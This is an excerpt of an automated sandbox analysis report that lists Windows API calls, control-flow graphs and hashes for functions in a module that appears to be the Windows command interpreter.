                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E04
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0589
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC059E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05AF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC05C5
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05EF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC0605
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0632
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC0647
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF706EC4E35), ref: 00007FF706EC55DA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5623
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5667
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC56BE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5702
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E81
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F69
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F95
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5037
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC504B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50DF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50F2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC510F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5130
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC514A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5175
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$P<dwj`$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1049357271-4202835959
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b126f1702366f536cdc0290ce0484146886976d8b64aeb935690e35a9b1b7135
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59C16C65A08B46D6EA00BB11EC351BBF7A1FF89BA4FC48134D90E473A5DF3CA4468360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC3C24 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 732 7ff706ec3c24-7ff706ec3c61 733 7ff706ec3c67-7ff706ec3c99 call 7ff706ebaf14 call 7ff706ebca40 732->733 734 7ff706ecec5a-7ff706ecec5f 732->734 743 7ff706ec3c9f-7ff706ec3cb2 call 7ff706ebb900 733->743 744 7ff706ecec97-7ff706ececa1 call 7ff706ec855c 733->744 734->733 735 7ff706ecec65-7ff706ecec6a 734->735 737 7ff706ec412e-7ff706ec415b call 7ff706ec8f80 735->737 743->744 749 7ff706ec3cb8-7ff706ec3cbc 743->749 750 7ff706ec3cbf-7ff706ec3cc7 749->750 750->750 751 7ff706ec3cc9-7ff706ec3ccd 750->751 752 7ff706ec3cd2-7ff706ec3cd8 751->752 753 7ff706ec3ce5-7ff706ec3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff706ec3cda-7ff706ec3cdf 752->754 756 7ff706ec3fb8 753->756 757 7ff706ec3d68-7ff706ec3d6c 753->757 754->753 755 7ff706ec3faa-7ff706ec3fb3 754->755 755->752 759 7ff706ec3fc6-7ff706ec3fec GetLastError call 7ff706ec855c call 7ff706eca5d6 756->759 757->756 758 7ff706ec3d72-7ff706ec3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff706ec3dd3-7ff706ec3ddd 758->760 762 7ff706ec3ff1-7ff706ec4007 call 7ff706ec855c _local_unwind 759->762 760->762 763 7ff706ec3de3-7ff706ec3dfb 760->763 773 7ff706ec400c-7ff706ec4022 GetLastError 762->773 765 7ff706ec3e01-7ff706ec3e11 763->765 766 7ff706ec40fe-7ff706ec4119 call 7ff706ec855c _local_unwind 763->766 765->766 771 7ff706ec3e17-7ff706ec3e28 765->771 778 7ff706ec411a-7ff706ec412c call 7ff706ebff70 call 7ff706ec855c 766->778 772 7ff706ec3e2c-7ff706ec3e34 771->772 772->772 775 7ff706ec3e36-7ff706ec3e3f 772->775 776 7ff706ec3e95-7ff706ec3e9c 773->776 777 7ff706ec4028-7ff706ec402b 773->777 779 7ff706ec3e42-7ff706ec3e55 775->779 781 7ff706ec3ecf-7ff706ec3ed3 776->781 782 7ff706ec3e9e-7ff706ec3ec2 call 7ff706ec2978 776->782 777->776 780 7ff706ec4031-7ff706ec4047 call 7ff706ec855c _local_unwind 777->780 778->737 784 7ff706ec3e66-7ff706ec3e8f GetFileAttributesW 779->784 785 7ff706ec3e57-7ff706ec3e60 779->785 801 7ff706ec404c-7ff706ec4062 call 7ff706ec855c _local_unwind 780->801 788 7ff706ec3ed5-7ff706ec3ef7 GetFileAttributesW 781->788 789 7ff706ec3f08-7ff706ec3f0b 781->789 793 7ff706ec3ec7-7ff706ec3ec9 782->793 784->773 784->776 785->784 791 7ff706ec3f9d-7ff706ec3fa5 785->791 794 7ff706ec4067-7ff706ec4098 GetLastError call 7ff706ec855c _local_unwind 788->794 795 7ff706ec3efd-7ff706ec3f02 788->795 797 7ff706ec3f1e-7ff706ec3f40 SetCurrentDirectoryW 789->797 798 7ff706ec3f0d-7ff706ec3f11 789->798 791->779 793->781 793->801 803 7ff706ec409d-7ff706ec40b3 call 7ff706ec855c _local_unwind 794->803 795->789 795->803 799 7ff706ec3f46-7ff706ec3f69 call 7ff706ec498c 797->799 800 7ff706ec40b8-7ff706ec40de GetLastError call 7ff706ec855c _local_unwind 797->800 798->799 805 7ff706ec3f13-7ff706ec3f1c 798->805 815 7ff706ec40e3-7ff706ec40f9 call 7ff706ec855c _local_unwind 799->815 816 7ff706ec3f6f-7ff706ec3f98 call 7ff706ec417c 799->816 800->815 801->794 803->800 805->797 805->799 815->766 816->778
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1809961153-366488791
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d28b187de5df886c849393368fe11504ded461ab225ca9f976165d27fccd3d44
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D14E22A0CB8585EA60EB15EC642BBF7A1FF84760F848136DA4E437A4DF3CE546C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2394 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 914 7ff706ec2394-7ff706ec2416 memset call 7ff706ebca40 917 7ff706ece0d2-7ff706ece0da call 7ff706ec4c1c 914->917 918 7ff706ec241c-7ff706ec2453 GetModuleFileNameW call 7ff706ec081c 914->918 923 7ff706ece0db-7ff706ece0ee call 7ff706ec498c 917->923 918->923 924 7ff706ec2459-7ff706ec2468 call 7ff706ec081c 918->924 929 7ff706ece0f4-7ff706ece107 call 7ff706ec498c 923->929 924->929 930 7ff706ec246e-7ff706ec247d call 7ff706ec081c 924->930 937 7ff706ece10d-7ff706ece123 929->937 935 7ff706ec2516-7ff706ec2529 call 7ff706ec498c 930->935 936 7ff706ec2483-7ff706ec2492 call 7ff706ec081c 930->936 935->936 936->937 944 7ff706ec2498-7ff706ec24a7 call 7ff706ec081c 936->944 940 7ff706ece125-7ff706ece139 wcschr 937->940 941 7ff706ece13f-7ff706ece17a _wcsupr 937->941 940->941 945 7ff706ece27c 940->945 946 7ff706ece181-7ff706ece199 wcsrchr 941->946 947 7ff706ece17c-7ff706ece17f 941->947 954 7ff706ece2a1-7ff706ece2c3 _wcsicmp 944->954 955 7ff706ec24ad-7ff706ec24c5 call 7ff706ec3c24 944->955 949 7ff706ece283-7ff706ece29b call 7ff706ec498c 945->949 950 7ff706ece19c 946->950 947->950 949->954 953 7ff706ece1a0-7ff706ece1a7 950->953 953->953 957 7ff706ece1a9-7ff706ece1bb 953->957 963 7ff706ec24ca-7ff706ec24db 955->963 958 7ff706ece264-7ff706ece277 call 7ff706ec1300 957->958 959 7ff706ece1c1-7ff706ece1e6 957->959 958->945 961 7ff706ece1e8-7ff706ece1f1 959->961 962 7ff706ece21a 959->962 965 7ff706ece1f3-7ff706ece1f6 961->965 966 7ff706ece201-7ff706ece210 961->966 969 7ff706ece21d-7ff706ece21f 962->969 967 7ff706ec24e9-7ff706ec2514 call 7ff706ec8f80 963->967 968 7ff706ec24dd-7ff706ec24e4 ??_V@YAXPEAX@Z 963->968 965->966 970 7ff706ece1f8-7ff706ece1ff 965->970 966->962 971 7ff706ece212-7ff706ece218 966->971 968->967 969->949 973 7ff706ece221-7ff706ece228 969->973 970->965 970->966 971->969 975 7ff706ece254-7ff706ece262 973->975 976 7ff706ece22a-7ff706ece231 973->976 975->945 977 7ff706ece234-7ff706ece237 976->977 977->975 978 7ff706ece239-7ff706ece242 977->978 978->975 979 7ff706ece244-7ff706ece252 978->979 979->975 979->977
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$P<dwj`$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2622545777-3018353264
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 82393b5b22ca6b85eb5985e178a3d1b42226ee55b58f3f127dba0449f8d9af95
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD915166B09B86C5EE24AB54DC706FAA3A1FF48B94FC44135D90E47695EF3CE50AC320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aefa3570ffdd2f50702d24f757001fda33ec732f0e566585414b1663ffdb4bbb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C941FE39A09B42CBE7146B14EC641BAFBA0FF89B55FC5D179C90E473A0DF3DA4058660
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBC620 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
